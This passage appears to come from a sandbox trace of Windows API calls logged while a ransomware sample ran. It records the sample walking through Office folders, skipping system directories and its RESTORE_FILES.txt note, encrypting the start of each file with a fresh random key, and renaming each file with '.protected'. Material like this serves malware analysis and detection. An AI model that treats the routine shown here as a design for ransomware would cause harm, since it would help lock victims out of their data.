returned 1 [0067.713] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.714] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.714] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.714] CloseHandle (hObject=0xd8) returned 1 [0067.715] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected") returned 81 [0067.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.protected")) returned 1 [0067.715] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Windows") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.715] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.715] StrStrIW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.716] lstrcmpW (lpString1="MSOINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.716] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.716] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.735] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0067.735] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.736] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.736] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.743] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.743] CloseHandle (hObject=0xd8) returned 1 [0067.744] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected") returned 82 [0067.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.protected")) returned 1 [0067.744] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.744] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", 
lpString2="$Recycle.bin") returned 1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.745] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.745] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.745] lstrcmpW (lpString1="OMSINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.745] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.745] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.745] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.746] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.746] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.746] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.777] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.777] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.779] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.781] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.792] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.792] CloseHandle (hObject=0xd8) returned 1 [0067.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected") returned 81 [0067.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.protected")) returned 1 [0067.794] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.794] lstrcmpiW 
(lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.794] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.794] StrStrIW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.794] lstrcmpW (lpString1="ONINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.794] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.794] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", 
lpSrch=".zip") returned 0x0 [0067.795] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.810] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.810] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.811] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.811] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.827] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.828] CloseHandle (hObject=0xd8) returned 1 [0067.828] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected") returned 80 [0067.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.protected")) returned 1 [0067.829] FindNextFileW (in: hFindFile=0x447cc0, 
lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Windows") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.829] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.829] StrStrIW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.829] lstrcmpW (lpString1="ONINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.829] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.829] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.829] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".rar") 
returned 0x0 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.832] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.883] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.883] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.884] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.884] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.893] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.894] CloseHandle (hObject=0xd8) returned 1 [0067.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected") returned 81 [0067.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.protected")) returned 1 [0067.895] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.895] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.895] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.895] lstrcmpW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.895] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.895] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.895] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") 
returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.898] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.899] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.900] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.900] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.915] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.915] CloseHandle (hObject=0xd8) returned 1 [0067.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected") returned 82 
[0067.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.protected")) returned 1 [0067.949] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Windows") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.949] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.949] lstrcmpW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.949] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
